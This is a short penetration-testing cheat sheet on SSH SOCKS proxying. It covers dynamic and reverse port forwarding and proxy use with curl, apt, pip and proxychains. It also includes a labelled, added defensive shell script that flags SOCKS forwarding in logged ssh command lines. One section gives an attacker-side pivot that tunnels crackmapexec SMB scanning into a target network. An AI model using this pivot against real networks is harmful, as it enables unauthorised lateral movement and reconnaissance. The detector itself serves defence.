SSH Socks Proxy

SSH comes with a built-in SOCKS5 proxy feature.

Local Port -> Distant -> Net

ssh -D PORT usr@DISTANT

Distant Port -> Local -> Net

Use case: run the ssh command on the target side; the port opens on the attacker side, then use proxychains to forward requests through it.

# Target side
ssh -R 8888 usr@DISTANT

# Attacker side
echo -e '[ProxyList]\nsocks5 127.0.0.1 8888' > /tmp/TARGET
proxychains -q -f /tmp/TARGET crackmapexec smb TARGET_NETWORK
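
Added example, not part of the original cheat sheet: a POSIX sh helper for defenders that classifies ssh command lines taken from process listings or audit logs by the two forwarding modes above, separating the SOCKS forms (-D PORT, -R PORT) from fixed -R forwards. The function names and the sample command lines are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original page): flag SSH SOCKS forwarding in
# command lines taken from process listings or audit logs.
# Scope: -D/-R given as flags; "-o RemoteForward=..." and ssh_config entries
# are not covered.

# "port" or "bind:port" after -R means a SOCKS listener on the remote side;
# a spec that names a destination (or a socket path) is a fixed forward.
classify_remote_spec() {
  case $1 in */*) echo remote-static; return ;; esac
  # Hide colons inside [IPv6] brackets, then count the remaining separators.
  colons=$(printf '%s' "$1" | sed 's/\[[^]]*]/X/g' | tr -cd ':')
  if [ "${#colons}" -le 1 ]; then echo remote-socks; else echo remote-static; fi
}

# Print one "<class> <spec>" line per -D/-R flag found in the command line $1.
classify_ssh_cmdline() {
  set -f; set -- $1; set +f          # split on whitespace without globbing
  case ${1##*/} in ssh) ;; *) echo not-ssh; return ;; esac
  shift; found=0
  while [ $# -gt 0 ]; do
    arg=$1; shift
    # Accept -D 1080, -D1080 and clusters of no-argument flags such as -fND.
    hit=$(printf '%s\n' "$arg" |
      sed -n 's/^-[46AaCfGgKkMNnqsTtVvXxYy]*\([DR]\)\(.*\)$/\1 \2/p')
    [ -n "$hit" ] || continue
    flag=${hit%% *}; spec=${hit#* }
    if [ -z "$spec" ] && [ $# -gt 0 ]; then spec=$1; shift; fi
    if [ "$flag" = D ]; then echo "local-socks $spec"
    else echo "$(classify_remote_spec "$spec") $spec"; fi
    found=1
  done
  [ "$found" -eq 1 ] || echo no-forward
}

# Constructed sample command lines (hosts and ports are placeholders).
while IFS= read -r line; do
  printf '%-48s => %s\n' "$line" "$(classify_ssh_cmdline "$line" | tr '\n' ';')"
done <<'EOF'
ssh -D 1080 usr@DISTANT
ssh -R 8888 usr@DISTANT
ssh -fNR 127.0.0.1:8888 usr@DISTANT
ssh -R 8888:10.0.0.5:445 usr@DISTANT
/usr/bin/ssh usr@DISTANT
EOF
```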

Proxy Usage

curl --socks5 HOST:PORT URL

apt-get -o Acquire::socks::proxy="socks5://HOST:PORT" update

# Install:
#   $ apt-get install proxychains4
# Then replace the default "socks4 127.0.0.1 9050" line in /etc/proxychains4.conf with "socks5 HOST PORT"
proxychains4 curl URL

python3 -m pip --proxy socks5://HOST:PORT install --upgrade aiohttp